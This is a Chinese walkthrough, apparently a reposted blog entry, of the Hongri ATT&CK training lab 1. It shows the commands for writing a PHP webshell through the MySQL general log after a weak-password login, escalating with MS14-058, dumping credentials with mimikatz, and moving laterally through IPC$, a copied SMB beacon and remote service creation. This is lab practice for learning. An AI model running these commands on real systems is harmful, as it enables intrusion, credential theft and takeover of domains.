当前位置: 首页 > news >正文

红日靶场(ATTCK实战)1通关方法


概述

首先搭建虚拟机,配置ip和网段。在服务页面找到突破口,如信息收集中端口扫描和子域名搜索,弱密码爆破后进入后台。在开启日志中用sql语法写入webshell,并用蚁剑连接。拿下web服务机后进行内网信息收集,再将蚁剑转到CS控制(cs生成的payload用蚁剑上传并运行,成功连接),用cs自带的ms14-058提权成system。横向移动,用minikatz读取次web的账号密码,建立ipc管道,控制web服务器机把smb的木马,传给内网电脑,用流量转发的思想成功控制域控。

外网打点 → 内网渗透 → 横向移动 → 控制域控”,涵盖了以下核心知识点:

  • Web应用漏洞利用(弱口令 + MySQL日志写Shell)
  • 权限提升与C2框架联动(MS14-058提权 + 蚁剑转CS)
  • 内网信息收集与凭证窃取(Mimikatz抓密码)
  • 横向移动与域控拿下(IPC管道 + SMB横向 + 流量转发)

搭建

外网(vm3)

内网(vm4)

导入虚拟机----“我已复制”

(这里解释一下:想练习一下ip网段配置就点的"我已复制",以上操作与虚拟机中已经配好的相同,也可点"移动"。复制:启动虚拟机后可能会改变ip;移动:不会改变ip。通关2中点的"移动")

web服务器 win7(配ip地址)

外网ip

本地连接1

内网ip

本地连接5

关闭防火墙后 ping一下检查

加入虚拟机

web服务器、域控、域内主机 密码:hongrisec@2026账户:god\administrator

web渗透

web服务器中开启phpstudy

信息收集 如nmap扫描 御剑高速tcp端口扫描工具

phpstudy弱密码 root/root

进入后台:http://192.168.111.128/phpmyadmin/

先查看有没有开启日志:SHOW VARIABLES LIKE "general%"

开启日志:set global general_log = on

设置日志路径,绝对路径在探针里有的:SET GLOBAL general_log_file = "C:/phpStudy/WWW/lfr.php";

设置成功后写马:SELECT "<?php @eval($_POST['x']);?>"

蚁剑连接

内网渗透

内网信息收集

等等等。。。。。

关闭防火墙

当前控制的用户是god\administrator

当前控制的电脑加入了域,域名是god.org

域中有5个用户

。。。。。

蚁剑转CS控制

CS生成一个马,通过蚁剑上传到服务器,然后终端里执行即可

kali要和web服务器(win7)一个网段,vmware中设置成vmw3

用蚁剑上传木马,并用蚁剑运行

提权

ms14-058

横向移动(流量转发、拿域控)

用minikatz读取此web服务器(win7)的账号密码

administrator hongrisec@2026

beacon中输入:shell net use \\192.168.52.138\ipc$ "hongrisec@2026" /user:god\administrator

已建立ipc管道,进行远程控制

新开监听SMB,并新创建木马(tageless)

上传SMB_hongriweb1.exe

控制web服务器(win7),将此木马传给内网电脑

shell copy SMB_hongriweb1.exe \\192.168.52.138\C$

控制web服务器远程给138主机创建服务,执行SMB_木马

shell sc \\owa.god.org create test binpath= "cmd.exe /c c:\SMB_hongriweb1.exe

开启服务shell sc \\owa.god.org start test

连接目标机器link owa.god.org

成功!!!

http://www.cnnetsun.cn/news/3149769.html

相关文章:

  • 少儿C++分级课程体系搭建:从L1到L4的教学设计经验分享
  • MAF预定义ChatClient中间件-07]PerServiceCallChatHistoryPersistingChatClient——基于ReAct循环的一步一存档
  • OpenClaw 的 sessions_spawn 隔离机制
  • 若依系统登录密码RSA加密实战:jsencrypt前端加密与Spring Boot后端解密
  • Go 数据结构 string 深度剖析
  • Docker--Docker Swarm集群
  • Deepin Boot Maker实战指南:跨平台启动盘制作高效方案深度解析
  • 苏州本地AI流量破局!一网推GEO苏州本地服务中心年度收录破8万
  • QA Use:推荐一款AI 原生 E2E 测试平台,自然语言一键跑通用例!
  • 冰河木马 v8.4 手动清除实战:3步删除注册表项与恢复文件关联
  • NS-Emu-Tools 技术架构深度解析:现代模拟器管理的工程化实践
  • 深入浅出CAP理论:从原理到实战,用Go实现一个最终一致性的分布式键值存储
  • 《HarmonyOS技术精讲-Media Library Kit》之实战:构建简易相册应用
  • 网络安全与网络协议知识点汇总 + 选填题库
  • 微信登录 + 微信支付 业务逻辑分步详解
  • 自动扩缩容:3 种策略的适用场景
  • qt的元对象系统(具备反射能力)有哪些部件
  • 把 HLS 字幕玩出花:zwPlayer 如何让 M3U8 视频支持全文搜索、翻译与码率自适应
  • 记录arm64内核调试环境搭建qemu_arm64_linux_01
  • Rust AI 工具配置层级:命令参数、环境变量和配置文件别打架
  • 扒源码 | Cube Sandbox 的微虚机、容器镜像、可写层,是怎么串到一起的
  • 2026年储能船型开关生产商盘点:谁在领跑市场?
  • win11下Multipass修改默认MULTIPASS_STORAGE位置后,持续报错waiting for daemon的问题
  • 5分钟掌握ppInk:Windows屏幕标注终极指南,让远程协作效率翻倍
  • 【Java课程设计/毕业设计】农家乐客房排班运维管理系统的设计与实现 乡村民宿文旅服务智能化管理平台【附源码、数据库、万字文档】
  • 【Java毕业设计】基于前后端分离的民宿农家乐综合管理系统的设计与实现 农家乐客房住宿预约与订单管理系统(源码+文档+远程调试,全bao定制等)
  • 基于单片机人脸识别电子密码锁智能门禁指纹识别语音提醒防盗成品112(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_
  • 手中有机, 心中不慌 (5 只 二手 Android 手机)
  • 干货教程:APK反编译神器安卓修改大师,一步步教你如何美化和修改安卓应用
  • Java计算机毕设之美容会员储值充值积分管理系统的设计与实现 美业技师业绩提成统计管理系统(完整前后端代码+说明文档+LW,调试定制等)